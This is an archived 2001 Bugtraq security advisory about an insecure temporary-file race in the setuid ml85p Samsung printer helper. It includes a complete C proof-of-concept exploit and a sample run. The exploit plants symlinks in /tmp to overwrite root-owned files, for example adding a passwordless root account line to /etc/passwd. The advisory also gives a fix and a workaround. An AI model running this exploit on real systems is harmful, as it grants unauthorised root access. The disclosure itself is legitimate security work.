OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: aleph1securityfocus.com
Date: Tue Jul 17 2001 - 00:42:30 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----- Forwarded message from Charles Stevenson <coreezlink.com> -----

    From: Charles Stevenson <coreezlink.com>
    To: Bugtraq <bugtraqsecurityfocus.com>, chmouelmandrakesoft.com
    CC: Kevin Finisterre <dotslashsnosoft.com>
    Subject: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake:
     ghostscript package)
    Date: Tue, 10 Jul 2001 16:27:39 -0600
    Message-ID: <3B4B815B.B1A65869ezlink.com>

    NOTE TO MODERATOR: PLEASE HOLD UNTIL 16 JULY 2001 TO ALLOW VENDOR TIME
    TO RELEASE AN UPDATE

    Author(s): Charles Stevenson, core at ezlink dot com
               Kevin Finisterre, dotslash at snosoft dot com

    Date Published: 2001 JULY 16

    Revision: 1.0

    Advisory ID: N/A

    Bugtraq ID: 3008

    CVE CAN: Non currently assigned.

    Title: ml85p Linux Helper Binary for Samsung ML-85G Printer Insecure
    Temporary File Creation

    Class: Insecure Temporary File Creation Race Condition

    Remotely Exploitable: No

    Locally Exploitable: Yes

    Vulnerability Description:

    The Samsung ML-85G GDI printer driver (helper binary to me;) suffers
    from insecure temporary file creation practices. It is possible to
    create files as root which can lead to root access.

    Vulnerable Systems:

    This exploit should be specific to the x86 architecture although rare
    cases may exist (the symlik attack is not plaform dependant). All
    systems running ml85p built from tarball are assumed to be vulnerable.
    ml85p is also distributed by MandrakeSoft in the ghostscript RPM. The
    permissions are more stringent and would require sys priveleges. I
    tested it on ml85p built from the tarball on my Debian system and Kevin
    tested on his Mandrake system.

    > [d0tslashlinux d0tslash]$ ls -al /usr/bin/ml85p
    > -rwsr-x--- 1 root sys 11676 Mar 30 11:43 /usr/bin/ml85p*

    Mandrake:

    ghostscript-5.50-71mdk.i586.rpm
    ghostscript-5.50-67mdk.i586.rpm
    ghostscript-5.50-67mdk.i586.rpm

    Solution/Vendor Information/Workaround:

    The author's site and the source code can be found at:

    http://members.nbci.com/rpragana/gdiprinters.html

    Recommended fix... use mkstemp() instead of the homegrown code:

    line 726: sprintf(gname,"/tmp/ml85g%d",time(0));

    Quick fix... chmod 0755 `which ml85p`

    Vendor notified on: 2001 JULY 10

    Credits:

    The credit goes to my good friend Kevin Finisterre for discovering the
    vulnerability, I (Charles Stevenson) wrote the proof-of-concept exploit.

    This advisory was drafted with the help of the SecurityFocus.com
    Vulnerability Help Team. For more information or assistance drafting
    advisories please mail vulnhelpsecurityfocus.com.

    Technical Description - Exploit/Concept Code:

    [-(coredevastator:~/bleedingedge)> ./ml85p-xpl /etc/rc.owned
    owned::0:0:root:/root:/bin/bash
    ml85p-xpl.c by core (c) 2001
    > backing up /etc/rc.owned to /tmp/ez.n6ZT1m
    /bin/cp: cannot stat `/etc/rc.owned': No such file or directory
    /bin/touch: getting attributes of `/etc/rc.owned': No such file or
    directory
    > creating a lot of symlinks
    Running a few times since I'm lazy.
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    Wrong file format.
    file position: f
    -rw-rw-rw- 1 root staff 0 Jul 10 13:14 /etc/rc.owned
    -rw-rw-rw- 1 root staff 32 Jul 10 13:14 /etc/rc.owned
    owned::0:0:root:/root:/bin/bash
    > cleaning up
    Don't forget to `cp /tmp/ez.n6ZT1m /etc/rc.owned && touch -r
    /tmp/ez.n6ZT1m /etc/rc.owned`!
    All done. Enjoy!

    You'll want to download this from my website or take care to reconstruct
    the lines which got wrapped.

    http://www.ezlink.com/~core/hot/ml85p-xpl.c

    /* ml85p-xpl.c
     *
     * Quick hack to exploit ml85p
     *
     * Simply run it with the file you want to create/overwrite
     * and the data you wish to place in the file.
     *
     * Example:
     *
     * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
     * $ ./ml85p-xpl /etc/passwd owned::0:0:root:/root:/bin/bash
     *
     * Then login as owned... etc..
     *
     * by Charles Stevenson <coreezlink.com>
     *
     * July 10 2001
     *
     * exploit discovered by KF <dotslashsnosoft.com>
     *
     * shoutz b10z and word to Kevin for the quick tag team :)
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    #include <time.h>

    #define TEMPFILE "/tmp/ez.XXXXXX"
    #define BRUTE 10

    void usage(char*);

    int main(int argc, char **argv){
       char tempfile[128] = TEMPFILE;
       int fd, i;
       time_t the_time;
       char temp[512];
       
       if (argc < 3){
          usage(argv[0]);
       }

       if((fd = mkstemp(tempfile))==-1){
          fprintf(stderr, "Error creating %s!\n",tempfile);
          exit(1);
       }

       /* begin lazy slacker coding */
       fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
       fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

       /* backup old file */
       sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
       system(temp);
       
       /* set the date/time */
       sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
       system(temp);

       the_time = time(NULL);

       fprintf(stderr, "> creating a lot of symlinks\n");

       for (i=0;i<BRUTE;i++){
          sprintf(temp, "/tmp/ml85g%d", the_time+i);
          symlink(argv[1], temp);
       }
       
       sprintf(temp, \
         "echo \"b1nary 0utlawz\">file; umask 000 && ml85p -sf file\n", \
         argv[2]);
       fprintf(stderr, "Running a few times since I'm lazy.\n");
       for (i=0;i<BRUTE;i++){
          system(temp);
       }

       sprintf(temp, "/bin/ls -l %s", argv[1]);
       system(temp);

       sprintf(temp, "echo \"%s\" > %s", argv[2], argv[1]);
       system(temp);

       sprintf(temp, "/bin/ls -l %s", argv[1]);
       system(temp);

       sprintf(temp, "/bin/cat %s", argv[1]);
       system(temp);

       fprintf(stderr, "> cleaning up\n");
       sprintf(temp, "/bin/rm -f /tmp/ml85*");
       system(temp);

       fprintf(stderr, \
         "Don't forget to `cp %s %s && touch -r %s %s`!\n",tempfile,\
         argv[1], tempfile, argv[1]);
       
       fprintf(stderr, "All done. Enjoy!\n");
       return 0;
    }

    void usage(char *name){
       
       fprintf(stderr, "usage: %s <filename> <data>\n", name);
       exit(1);
    }

    /* EOF */

    Disclaimer:

    The information within this paper may change without notice. Use of
    this information constitutes acceptance for use in an as is condition.
    There are no warranties with regard to this information. In no event
    shall the author(s) be liable for any damages whatsoever arising out of
    or in connection with the use or spread of this information. Any use of
    this information is at the user's own risk.

    ----- End forwarded message -----

    -- 
    Elias Levy
    SecurityFocus.com
    http://www.securityfocus.com/
    Si vis pacem, para bellum